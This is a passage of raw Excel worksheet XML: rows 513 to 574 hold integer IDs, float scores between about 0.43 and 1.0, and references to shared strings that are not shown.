        <v>0.65539997816085815</v>
      </c>
      <c r="F513" t="s">
        <v>7</v>
      </c>
      <c r="G513" t="s">
        <v>1020</v>
      </c>
      <c r="H513" t="s">
        <v>1017</v>
      </c>
    </row>
    <row r="514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A514" s="1">
        <v>512</v>
      </c>
      <c r="B514">
        <v>1724</v>
      </c>
      <c r="C514">
        <v>1724</v>
      </c>
      <c r="D514">
        <v>0</v>
      </c>
      <c r="E514">
        <v>0.96789997816085815</v>
      </c>
      <c r="F514" t="s">
        <v>7</v>
      </c>
      <c r="G514" t="s">
        <v>1021</v>
      </c>
      <c r="H514" t="s">
        <v>1022</v>
      </c>
    </row>
    <row r="515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A515" s="1">
        <v>513</v>
      </c>
      <c r="B515">
        <v>1736</v>
      </c>
      <c r="C515">
        <v>1736</v>
      </c>
      <c r="D515">
        <v>0</v>
      </c>
      <c r="E515">
        <v>0.5503000020980835</v>
      </c>
      <c r="F515" t="s">
        <v>7</v>
      </c>
      <c r="G515" t="s">
        <v>1023</v>
      </c>
      <c r="H515" t="s">
        <v>1007</v>
      </c>
    </row>
    <row r="516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A516" s="1">
        <v>514</v>
      </c>
      <c r="B516">
        <v>1725</v>
      </c>
      <c r="C516">
        <v>1725</v>
      </c>
      <c r="D516">
        <v>0</v>
      </c>
      <c r="E516">
        <v>0.73710000514984131</v>
      </c>
      <c r="F516" t="s">
        <v>7</v>
      </c>
      <c r="G516" t="s">
        <v>1024</v>
      </c>
      <c r="H516" t="s">
        <v>1025</v>
      </c>
    </row>
    <row r="517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A517" s="1">
        <v>515</v>
      </c>
      <c r="B517">
        <v>1727</v>
      </c>
      <c r="C517">
        <v>1727</v>
      </c>
      <c r="D517">
        <v>0</v>
      </c>
      <c r="E517">
        <v>0.82730001211166382</v>
      </c>
      <c r="F517" t="s">
        <v>7</v>
      </c>
      <c r="G517" t="s">
        <v>1026</v>
      </c>
      <c r="H517" t="s">
        <v>1027</v>
      </c>
    </row>
    <row r="518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A518" s="1">
        <v>516</v>
      </c>
      <c r="B518">
        <v>1728</v>
      </c>
      <c r="C518">
        <v>1728</v>
      </c>
      <c r="D518">
        <v>0</v>
      </c>
      <c r="E518">
        <v>0.99409997463226318</v>
      </c>
      <c r="F518" t="s">
        <v>7</v>
      </c>
      <c r="G518" t="s">
        <v>1028</v>
      </c>
      <c r="H518" t="s">
        <v>1029</v>
      </c>
    </row>
    <row r="519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A519" s="1">
        <v>517</v>
      </c>
      <c r="B519">
        <v>1729</v>
      </c>
      <c r="C519">
        <v>1729</v>
      </c>
      <c r="D519">
        <v>0</v>
      </c>
      <c r="E519">
        <v>0.4343000054359436</v>
      </c>
      <c r="F519" t="s">
        <v>7</v>
      </c>
      <c r="G519" t="s">
        <v>1030</v>
      </c>
      <c r="H519" t="s">
        <v>1031</v>
      </c>
    </row>
    <row r="520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A520" s="1">
        <v>518</v>
      </c>
      <c r="B520">
        <v>7144</v>
      </c>
      <c r="C520">
        <v>7144</v>
      </c>
      <c r="D520">
        <v>0</v>
      </c>
      <c r="E520">
        <v>0.55650001764297485</v>
      </c>
      <c r="F520" t="s">
        <v>7</v>
      </c>
      <c r="G520" t="s">
        <v>1032</v>
      </c>
      <c r="H520" t="s">
        <v>1033</v>
      </c>
    </row>
    <row r="521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A521" s="1">
        <v>519</v>
      </c>
      <c r="B521">
        <v>1731</v>
      </c>
      <c r="C521">
        <v>1731</v>
      </c>
      <c r="D521">
        <v>0</v>
      </c>
      <c r="E521">
        <v>0.62319999933242798</v>
      </c>
      <c r="F521" t="s">
        <v>7</v>
      </c>
      <c r="G521" t="s">
        <v>1034</v>
      </c>
      <c r="H521" t="s">
        <v>1035</v>
      </c>
    </row>
    <row r="522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A522" s="1">
        <v>520</v>
      </c>
      <c r="B522">
        <v>1732</v>
      </c>
      <c r="C522">
        <v>1732</v>
      </c>
      <c r="D522">
        <v>0</v>
      </c>
      <c r="E522">
        <v>0.61100000143051147</v>
      </c>
      <c r="F522" t="s">
        <v>7</v>
      </c>
      <c r="G522" t="s">
        <v>1036</v>
      </c>
      <c r="H522" t="s">
        <v>1037</v>
      </c>
    </row>
    <row r="523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A523" s="1">
        <v>521</v>
      </c>
      <c r="B523">
        <v>1733</v>
      </c>
      <c r="C523">
        <v>1733</v>
      </c>
      <c r="D523">
        <v>0</v>
      </c>
      <c r="E523">
        <v>0.9724000096321106</v>
      </c>
      <c r="F523" t="s">
        <v>7</v>
      </c>
      <c r="G523" t="s">
        <v>1038</v>
      </c>
      <c r="H523" t="s">
        <v>1039</v>
      </c>
    </row>
    <row r="524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A524" s="1">
        <v>522</v>
      </c>
      <c r="B524">
        <v>1726</v>
      </c>
      <c r="C524">
        <v>1726</v>
      </c>
      <c r="D524">
        <v>0</v>
      </c>
      <c r="E524">
        <v>0.99839997291564941</v>
      </c>
      <c r="F524" t="s">
        <v>7</v>
      </c>
      <c r="G524" t="s">
        <v>1040</v>
      </c>
      <c r="H524" t="s">
        <v>1041</v>
      </c>
    </row>
    <row r="525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A525" s="1">
        <v>523</v>
      </c>
      <c r="B525">
        <v>4648</v>
      </c>
      <c r="C525">
        <v>4648</v>
      </c>
      <c r="D525">
        <v>0</v>
      </c>
      <c r="E525">
        <v>0.99260002374649048</v>
      </c>
      <c r="F525" t="s">
        <v>7</v>
      </c>
      <c r="G525" t="s">
        <v>1042</v>
      </c>
      <c r="H525" t="s">
        <v>1043</v>
      </c>
    </row>
    <row r="526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A526" s="1">
        <v>524</v>
      </c>
      <c r="B526">
        <v>4646</v>
      </c>
      <c r="C526">
        <v>4646</v>
      </c>
      <c r="D526">
        <v>0</v>
      </c>
      <c r="E526">
        <v>0.99900001287460327</v>
      </c>
      <c r="F526" t="s">
        <v>7</v>
      </c>
      <c r="G526" t="s">
        <v>1044</v>
      </c>
      <c r="H526" t="s">
        <v>1045</v>
      </c>
    </row>
    <row r="527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A527" s="1">
        <v>525</v>
      </c>
      <c r="B527">
        <v>1772</v>
      </c>
      <c r="C527">
        <v>1772</v>
      </c>
      <c r="D527">
        <v>0</v>
      </c>
      <c r="E527">
        <v>0.68599998950958252</v>
      </c>
      <c r="F527" t="s">
        <v>7</v>
      </c>
      <c r="G527" t="s">
        <v>1046</v>
      </c>
      <c r="H527" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A528" s="1">
        <v>526</v>
      </c>
      <c r="B528">
        <v>7111</v>
      </c>
      <c r="C528">
        <v>7111</v>
      </c>
      <c r="D528">
        <v>0</v>
      </c>
      <c r="E528">
        <v>0.61430001258850098</v>
      </c>
      <c r="F528" t="s">
        <v>7</v>
      </c>
      <c r="G528" t="s">
        <v>1048</v>
      </c>
      <c r="H528" t="s">
        <v>1049</v>
      </c>
    </row>
    <row r="529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A529" s="1">
        <v>527</v>
      </c>
      <c r="B529">
        <v>1807</v>
      </c>
      <c r="C529">
        <v>1807</v>
      </c>
      <c r="D529">
        <v>0</v>
      </c>
      <c r="E529">
        <v>0.78350001573562622</v>
      </c>
      <c r="F529" t="s">
        <v>7</v>
      </c>
      <c r="G529" t="s">
        <v>1050</v>
      </c>
      <c r="H529" t="s">
        <v>1051</v>
      </c>
    </row>
    <row r="530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A530" s="1">
        <v>528</v>
      </c>
      <c r="B530">
        <v>1811</v>
      </c>
      <c r="C530">
        <v>1811</v>
      </c>
      <c r="D530">
        <v>0</v>
      </c>
      <c r="E530">
        <v>0.65869998931884766</v>
      </c>
      <c r="F530" t="s">
        <v>7</v>
      </c>
      <c r="G530" t="s">
        <v>1052</v>
      </c>
      <c r="H530" t="s">
        <v>1053</v>
      </c>
    </row>
    <row r="531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A531" s="1">
        <v>529</v>
      </c>
      <c r="B531">
        <v>7110</v>
      </c>
      <c r="C531">
        <v>7110</v>
      </c>
      <c r="D531">
        <v>0</v>
      </c>
      <c r="E531">
        <v>0.55709999799728394</v>
      </c>
      <c r="F531" t="s">
        <v>7</v>
      </c>
      <c r="G531" t="s">
        <v>1054</v>
      </c>
      <c r="H531" t="s">
        <v>1055</v>
      </c>
    </row>
    <row r="532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A532" s="1">
        <v>530</v>
      </c>
      <c r="B532">
        <v>1813</v>
      </c>
      <c r="C532">
        <v>1813</v>
      </c>
      <c r="D532">
        <v>0</v>
      </c>
      <c r="E532">
        <v>0.553600013256073</v>
      </c>
      <c r="F532" t="s">
        <v>7</v>
      </c>
      <c r="G532" t="s">
        <v>1056</v>
      </c>
      <c r="H532" t="s">
        <v>1057</v>
      </c>
    </row>
    <row r="533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A533" s="1">
        <v>531</v>
      </c>
      <c r="B533">
        <v>5939</v>
      </c>
      <c r="C533">
        <v>5939</v>
      </c>
      <c r="D533">
        <v>0</v>
      </c>
      <c r="E533">
        <v>0.9934999942779541</v>
      </c>
      <c r="F533" t="s">
        <v>7</v>
      </c>
      <c r="G533" t="s">
        <v>1058</v>
      </c>
      <c r="H533" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A534" s="1">
        <v>532</v>
      </c>
      <c r="B534">
        <v>7109</v>
      </c>
      <c r="C534">
        <v>7109</v>
      </c>
      <c r="D534">
        <v>0</v>
      </c>
      <c r="E534">
        <v>0.99510002136230469</v>
      </c>
      <c r="F534" t="s">
        <v>7</v>
      </c>
      <c r="G534" t="s">
        <v>1060</v>
      </c>
      <c r="H534" t="s">
        <v>1061</v>
      </c>
    </row>
    <row r="535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A535" s="1">
        <v>533</v>
      </c>
      <c r="B535">
        <v>4630</v>
      </c>
      <c r="C535">
        <v>4630</v>
      </c>
      <c r="D535">
        <v>0</v>
      </c>
      <c r="E535">
        <v>0.99220001697540283</v>
      </c>
      <c r="F535" t="s">
        <v>7</v>
      </c>
      <c r="G535" t="s">
        <v>1062</v>
      </c>
      <c r="H535" t="s">
        <v>1063</v>
      </c>
    </row>
    <row r="536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A536" s="1">
        <v>534</v>
      </c>
      <c r="B536">
        <v>1820</v>
      </c>
      <c r="C536">
        <v>1820</v>
      </c>
      <c r="D536">
        <v>0</v>
      </c>
      <c r="E536">
        <v>0.96439999341964722</v>
      </c>
      <c r="F536" t="s">
        <v>7</v>
      </c>
      <c r="G536" t="s">
        <v>1064</v>
      </c>
      <c r="H536" t="s">
        <v>1065</v>
      </c>
    </row>
    <row r="537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A537" s="1">
        <v>535</v>
      </c>
      <c r="B537">
        <v>4621</v>
      </c>
      <c r="C537">
        <v>4621</v>
      </c>
      <c r="D537">
        <v>0</v>
      </c>
      <c r="E537">
        <v>0.77490001916885376</v>
      </c>
      <c r="F537" t="s">
        <v>7</v>
      </c>
      <c r="G537" t="s">
        <v>1066</v>
      </c>
      <c r="H537" t="s">
        <v>1067</v>
      </c>
    </row>
    <row r="538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A538" s="1">
        <v>536</v>
      </c>
      <c r="B538">
        <v>4618</v>
      </c>
      <c r="C538">
        <v>4618</v>
      </c>
      <c r="D538">
        <v>0</v>
      </c>
      <c r="E538">
        <v>0.45930001139640808</v>
      </c>
      <c r="F538" t="s">
        <v>7</v>
      </c>
      <c r="G538" t="s">
        <v>1068</v>
      </c>
      <c r="H538" t="s">
        <v>1069</v>
      </c>
    </row>
    <row r="539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A539" s="1">
        <v>537</v>
      </c>
      <c r="B539">
        <v>1827</v>
      </c>
      <c r="C539">
        <v>1827</v>
      </c>
      <c r="D539">
        <v>0</v>
      </c>
      <c r="E539">
        <v>0.93930000066757202</v>
      </c>
      <c r="F539" t="s">
        <v>7</v>
      </c>
      <c r="G539" t="s">
        <v>1070</v>
      </c>
      <c r="H539" t="s">
        <v>1071</v>
      </c>
    </row>
    <row r="540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A540" s="1">
        <v>538</v>
      </c>
      <c r="B540">
        <v>4617</v>
      </c>
      <c r="C540">
        <v>4617</v>
      </c>
      <c r="D540">
        <v>0</v>
      </c>
      <c r="E540">
        <v>0.53339999914169312</v>
      </c>
      <c r="F540" t="s">
        <v>7</v>
      </c>
      <c r="G540" t="s">
        <v>1072</v>
      </c>
      <c r="H540" t="s">
        <v>1073</v>
      </c>
    </row>
    <row r="541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A541" s="1">
        <v>539</v>
      </c>
      <c r="B541">
        <v>6367</v>
      </c>
      <c r="C541">
        <v>6367</v>
      </c>
      <c r="D541">
        <v>0</v>
      </c>
      <c r="E541">
        <v>0.97769999504089355</v>
      </c>
      <c r="F541" t="s">
        <v>7</v>
      </c>
      <c r="G541" t="s">
        <v>1074</v>
      </c>
      <c r="H541" t="s">
        <v>1075</v>
      </c>
    </row>
    <row r="542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A542" s="1">
        <v>540</v>
      </c>
      <c r="B542">
        <v>4614</v>
      </c>
      <c r="C542">
        <v>4614</v>
      </c>
      <c r="D542">
        <v>0</v>
      </c>
      <c r="E542">
        <v>0.65369999408721924</v>
      </c>
      <c r="F542" t="s">
        <v>7</v>
      </c>
      <c r="G542" t="s">
        <v>1076</v>
      </c>
      <c r="H542" t="s">
        <v>1077</v>
      </c>
    </row>
    <row r="543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A543" s="1">
        <v>541</v>
      </c>
      <c r="B543">
        <v>5945</v>
      </c>
      <c r="C543">
        <v>5945</v>
      </c>
      <c r="D543">
        <v>0</v>
      </c>
      <c r="E543">
        <v>0.5656999945640564</v>
      </c>
      <c r="F543" t="s">
        <v>7</v>
      </c>
      <c r="G543" t="s">
        <v>1078</v>
      </c>
      <c r="H543" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A544" s="1">
        <v>542</v>
      </c>
      <c r="B544">
        <v>7108</v>
      </c>
      <c r="C544">
        <v>7108</v>
      </c>
      <c r="D544">
        <v>0</v>
      </c>
      <c r="E544">
        <v>0.99550002813339233</v>
      </c>
      <c r="F544" t="s">
        <v>7</v>
      </c>
      <c r="G544" t="s">
        <v>1080</v>
      </c>
      <c r="H544" t="s">
        <v>1081</v>
      </c>
    </row>
    <row r="545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A545" s="1">
        <v>543</v>
      </c>
      <c r="B545">
        <v>1804</v>
      </c>
      <c r="C545">
        <v>1804</v>
      </c>
      <c r="D545">
        <v>0</v>
      </c>
      <c r="E545">
        <v>0.91909998655319214</v>
      </c>
      <c r="F545" t="s">
        <v>7</v>
      </c>
      <c r="G545" t="s">
        <v>1082</v>
      </c>
      <c r="H545" t="s">
        <v>1083</v>
      </c>
    </row>
    <row r="546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A546" s="1">
        <v>544</v>
      </c>
      <c r="B546">
        <v>1801</v>
      </c>
      <c r="C546">
        <v>1801</v>
      </c>
      <c r="D546">
        <v>0</v>
      </c>
      <c r="E546">
        <v>0.67580002546310425</v>
      </c>
      <c r="F546" t="s">
        <v>7</v>
      </c>
      <c r="G546" t="s">
        <v>1084</v>
      </c>
      <c r="H546" t="s">
        <v>1085</v>
      </c>
    </row>
    <row r="547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A547" s="1">
        <v>545</v>
      </c>
      <c r="B547">
        <v>1800</v>
      </c>
      <c r="C547">
        <v>1800</v>
      </c>
      <c r="D547">
        <v>0</v>
      </c>
      <c r="E547">
        <v>0.99260002374649048</v>
      </c>
      <c r="F547" t="s">
        <v>7</v>
      </c>
      <c r="G547" t="s">
        <v>1086</v>
      </c>
      <c r="H547" t="s">
        <v>1087</v>
      </c>
    </row>
    <row r="548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A548" s="1">
        <v>546</v>
      </c>
      <c r="B548">
        <v>7130</v>
      </c>
      <c r="C548">
        <v>7130</v>
      </c>
      <c r="D548">
        <v>0</v>
      </c>
      <c r="E548">
        <v>0.99779999256134033</v>
      </c>
      <c r="F548" t="s">
        <v>7</v>
      </c>
      <c r="G548" t="s">
        <v>1088</v>
      </c>
      <c r="H548" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A549" s="1">
        <v>547</v>
      </c>
      <c r="B549">
        <v>7128</v>
      </c>
      <c r="C549">
        <v>7128</v>
      </c>
      <c r="D549">
        <v>0</v>
      </c>
      <c r="E549">
        <v>0.47679999470710749</v>
      </c>
      <c r="F549" t="s">
        <v>7</v>
      </c>
      <c r="G549" t="s">
        <v>1089</v>
      </c>
      <c r="H549" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A550" s="1">
        <v>548</v>
      </c>
      <c r="B550">
        <v>7127</v>
      </c>
      <c r="C550">
        <v>7127</v>
      </c>
      <c r="D550">
        <v>0</v>
      </c>
      <c r="E550">
        <v>0.47710001468658447</v>
      </c>
      <c r="F550" t="s">
        <v>7</v>
      </c>
      <c r="G550" t="s">
        <v>1090</v>
      </c>
      <c r="H550" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A551" s="1">
        <v>549</v>
      </c>
      <c r="B551">
        <v>7126</v>
      </c>
      <c r="C551">
        <v>7126</v>
      </c>
      <c r="D551">
        <v>0</v>
      </c>
      <c r="E551">
        <v>0.47729998826980591</v>
      </c>
      <c r="F551" t="s">
        <v>7</v>
      </c>
      <c r="G551" t="s">
        <v>1091</v>
      </c>
      <c r="H551" t="s">
        <v>366</v>
      </c>
    </row>
    <row r="552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A552" s="1">
        <v>550</v>
      </c>
      <c r="B552">
        <v>4644</v>
      </c>
      <c r="C552">
        <v>4644</v>
      </c>
      <c r="D552">
        <v>0</v>
      </c>
      <c r="E552">
        <v>0.99959999322891235</v>
      </c>
      <c r="F552" t="s">
        <v>7</v>
      </c>
      <c r="G552" t="s">
        <v>1092</v>
      </c>
      <c r="H552" t="s">
        <v>1093</v>
      </c>
    </row>
    <row r="553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A553" s="1">
        <v>551</v>
      </c>
      <c r="B553">
        <v>7125</v>
      </c>
      <c r="C553">
        <v>7125</v>
      </c>
      <c r="D553">
        <v>0</v>
      </c>
      <c r="E553">
        <v>0.85140001773834229</v>
      </c>
      <c r="F553" t="s">
        <v>7</v>
      </c>
      <c r="G553" t="s">
        <v>1094</v>
      </c>
      <c r="H553" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A554" s="1">
        <v>552</v>
      </c>
      <c r="B554">
        <v>1780</v>
      </c>
      <c r="C554">
        <v>1780</v>
      </c>
      <c r="D554">
        <v>0</v>
      </c>
      <c r="E554">
        <v>0.52679997682571411</v>
      </c>
      <c r="F554" t="s">
        <v>7</v>
      </c>
      <c r="G554" t="s">
        <v>1096</v>
      </c>
      <c r="H554" t="s">
        <v>1097</v>
      </c>
    </row>
    <row r="555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A555" s="1">
        <v>553</v>
      </c>
      <c r="B555">
        <v>4643</v>
      </c>
      <c r="C555">
        <v>4643</v>
      </c>
      <c r="D555">
        <v>0</v>
      </c>
      <c r="E555">
        <v>0.9944000244140625</v>
      </c>
      <c r="F555" t="s">
        <v>7</v>
      </c>
      <c r="G555" t="s">
        <v>1098</v>
      </c>
      <c r="H555" t="s">
        <v>1099</v>
      </c>
    </row>
    <row r="556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A556" s="1">
        <v>554</v>
      </c>
      <c r="B556">
        <v>4642</v>
      </c>
      <c r="C556">
        <v>4642</v>
      </c>
      <c r="D556">
        <v>0</v>
      </c>
      <c r="E556">
        <v>0.99830001592636108</v>
      </c>
      <c r="F556" t="s">
        <v>7</v>
      </c>
      <c r="G556" t="s">
        <v>1100</v>
      </c>
      <c r="H556" t="s">
        <v>1101</v>
      </c>
    </row>
    <row r="557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A557" s="1">
        <v>555</v>
      </c>
      <c r="B557">
        <v>5935</v>
      </c>
      <c r="C557">
        <v>5935</v>
      </c>
      <c r="D557">
        <v>0</v>
      </c>
      <c r="E557">
        <v>0.99330002069473267</v>
      </c>
      <c r="F557" t="s">
        <v>7</v>
      </c>
      <c r="G557" t="s">
        <v>1102</v>
      </c>
      <c r="H557" t="s">
        <v>1103</v>
      </c>
    </row>
    <row r="558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A558" s="1">
        <v>556</v>
      </c>
      <c r="B558">
        <v>7119</v>
      </c>
      <c r="C558">
        <v>7119</v>
      </c>
      <c r="D558">
        <v>0</v>
      </c>
      <c r="E558">
        <v>0.73379999399185181</v>
      </c>
      <c r="F558" t="s">
        <v>7</v>
      </c>
      <c r="G558" t="s">
        <v>1104</v>
      </c>
      <c r="H558" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A559" s="1">
        <v>557</v>
      </c>
      <c r="B559">
        <v>1791</v>
      </c>
      <c r="C559">
        <v>1791</v>
      </c>
      <c r="D559">
        <v>0</v>
      </c>
      <c r="E559">
        <v>0.82489997148513794</v>
      </c>
      <c r="F559" t="s">
        <v>7</v>
      </c>
      <c r="G559" t="s">
        <v>1106</v>
      </c>
      <c r="H559" t="s">
        <v>1107</v>
      </c>
    </row>
    <row r="560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A560" s="1">
        <v>558</v>
      </c>
      <c r="B560">
        <v>4635</v>
      </c>
      <c r="C560">
        <v>4635</v>
      </c>
      <c r="D560">
        <v>0</v>
      </c>
      <c r="E560">
        <v>0.99479997158050537</v>
      </c>
      <c r="F560" t="s">
        <v>7</v>
      </c>
      <c r="G560" t="s">
        <v>1108</v>
      </c>
      <c r="H560" t="s">
        <v>1109</v>
      </c>
    </row>
    <row r="561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A561" s="1">
        <v>559</v>
      </c>
      <c r="B561">
        <v>4634</v>
      </c>
      <c r="C561">
        <v>4634</v>
      </c>
      <c r="D561">
        <v>0</v>
      </c>
      <c r="E561">
        <v>0.84140002727508545</v>
      </c>
      <c r="F561" t="s">
        <v>7</v>
      </c>
      <c r="G561" t="s">
        <v>1110</v>
      </c>
      <c r="H561" t="s">
        <v>1111</v>
      </c>
    </row>
    <row r="562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A562" s="1">
        <v>560</v>
      </c>
      <c r="B562">
        <v>1795</v>
      </c>
      <c r="C562">
        <v>1795</v>
      </c>
      <c r="D562">
        <v>0</v>
      </c>
      <c r="E562">
        <v>0.80220001935958862</v>
      </c>
      <c r="F562" t="s">
        <v>7</v>
      </c>
      <c r="G562" t="s">
        <v>1112</v>
      </c>
      <c r="H562" t="s">
        <v>1113</v>
      </c>
    </row>
    <row r="563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A563" s="1">
        <v>561</v>
      </c>
      <c r="B563">
        <v>1797</v>
      </c>
      <c r="C563">
        <v>1797</v>
      </c>
      <c r="D563">
        <v>0</v>
      </c>
      <c r="E563">
        <v>0.9968000054359436</v>
      </c>
      <c r="F563" t="s">
        <v>7</v>
      </c>
      <c r="G563" t="s">
        <v>1114</v>
      </c>
      <c r="H563" t="s">
        <v>1115</v>
      </c>
    </row>
    <row r="564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A564" s="1">
        <v>562</v>
      </c>
      <c r="B564">
        <v>1798</v>
      </c>
      <c r="C564">
        <v>1798</v>
      </c>
      <c r="D564">
        <v>0</v>
      </c>
      <c r="E564">
        <v>0.65939998626708984</v>
      </c>
      <c r="F564" t="s">
        <v>7</v>
      </c>
      <c r="G564" t="s">
        <v>1116</v>
      </c>
      <c r="H564" t="s">
        <v>1117</v>
      </c>
    </row>
    <row r="565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A565" s="1">
        <v>563</v>
      </c>
      <c r="B565">
        <v>1715</v>
      </c>
      <c r="C565">
        <v>1715</v>
      </c>
      <c r="D565">
        <v>0</v>
      </c>
      <c r="E565">
        <v>0.99370002746582031</v>
      </c>
      <c r="F565" t="s">
        <v>7</v>
      </c>
      <c r="G565" t="s">
        <v>1118</v>
      </c>
      <c r="H565" t="s">
        <v>1119</v>
      </c>
    </row>
    <row r="566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A566" s="1">
        <v>564</v>
      </c>
      <c r="B566">
        <v>4723</v>
      </c>
      <c r="C566">
        <v>4723</v>
      </c>
      <c r="D566">
        <v>0</v>
      </c>
      <c r="E566">
        <v>0.99779999256134033</v>
      </c>
      <c r="F566" t="s">
        <v>7</v>
      </c>
      <c r="G566" t="s">
        <v>1120</v>
      </c>
      <c r="H566" t="s">
        <v>1121</v>
      </c>
    </row>
    <row r="567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A567" s="1">
        <v>565</v>
      </c>
      <c r="B567">
        <v>1714</v>
      </c>
      <c r="C567">
        <v>1714</v>
      </c>
      <c r="D567">
        <v>0</v>
      </c>
      <c r="E567">
        <v>0.6632000207901001</v>
      </c>
      <c r="F567" t="s">
        <v>7</v>
      </c>
      <c r="G567" t="s">
        <v>1122</v>
      </c>
      <c r="H567" t="s">
        <v>1123</v>
      </c>
    </row>
    <row r="568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A568" s="1">
        <v>566</v>
      </c>
      <c r="B568">
        <v>1711</v>
      </c>
      <c r="C568">
        <v>1711</v>
      </c>
      <c r="D568">
        <v>0</v>
      </c>
      <c r="E568">
        <v>0.86549997329711914</v>
      </c>
      <c r="F568" t="s">
        <v>7</v>
      </c>
      <c r="G568" t="s">
        <v>1124</v>
      </c>
      <c r="H568" t="s">
        <v>1125</v>
      </c>
    </row>
    <row r="569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A569" s="1">
        <v>567</v>
      </c>
      <c r="B569">
        <v>4709</v>
      </c>
      <c r="C569">
        <v>4709</v>
      </c>
      <c r="D569">
        <v>0</v>
      </c>
      <c r="E569">
        <v>0.9814000129699707</v>
      </c>
      <c r="F569" t="s">
        <v>7</v>
      </c>
      <c r="G569" t="s">
        <v>1126</v>
      </c>
      <c r="H569" t="s">
        <v>1127</v>
      </c>
    </row>
    <row r="570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A570" s="1">
        <v>568</v>
      </c>
      <c r="B570">
        <v>4708</v>
      </c>
      <c r="C570">
        <v>4708</v>
      </c>
      <c r="D570">
        <v>0</v>
      </c>
      <c r="E570">
        <v>0.8465999960899353</v>
      </c>
      <c r="F570" t="s">
        <v>7</v>
      </c>
      <c r="G570" t="s">
        <v>1128</v>
      </c>
      <c r="H570" t="s">
        <v>1129</v>
      </c>
    </row>
    <row r="571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A571" s="1">
        <v>569</v>
      </c>
      <c r="B571">
        <v>4707</v>
      </c>
      <c r="C571">
        <v>4707</v>
      </c>
      <c r="D571">
        <v>0</v>
      </c>
      <c r="E571">
        <v>0.83429998159408569</v>
      </c>
      <c r="F571" t="s">
        <v>7</v>
      </c>
      <c r="G571" t="s">
        <v>1130</v>
      </c>
      <c r="H571" t="s">
        <v>1131</v>
      </c>
    </row>
    <row r="572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A572" s="1">
        <v>570</v>
      </c>
      <c r="B572">
        <v>4706</v>
      </c>
      <c r="C572">
        <v>4706</v>
      </c>
      <c r="D572">
        <v>0</v>
      </c>
      <c r="E572">
        <v>0.99750000238418579</v>
      </c>
      <c r="F572" t="s">
        <v>7</v>
      </c>
      <c r="G572" t="s">
        <v>1132</v>
      </c>
      <c r="H572" t="s">
        <v>1133</v>
      </c>
    </row>
    <row r="573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A573" s="1">
        <v>571</v>
      </c>
      <c r="B573">
        <v>4705</v>
      </c>
      <c r="C573">
        <v>4705</v>
      </c>
      <c r="D573">
        <v>0</v>
      </c>
      <c r="E573">
        <v>0.85509997606277466</v>
      </c>
      <c r="F573" t="s">
        <v>7</v>
      </c>
      <c r="G573" t="s">
        <v>1134</v>
      </c>
      <c r="H573" t="s">
        <v>1135</v>
      </c>
    </row>
    <row r="574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A574" s="1">
        <v>572</v>
      </c>
      <c r="B574">
        <v>4704</v>
      </c>
      <c r="C574">
        <v>4704</v>
      </c>
      <c r="D574">
        <v>0</v>
      </c>
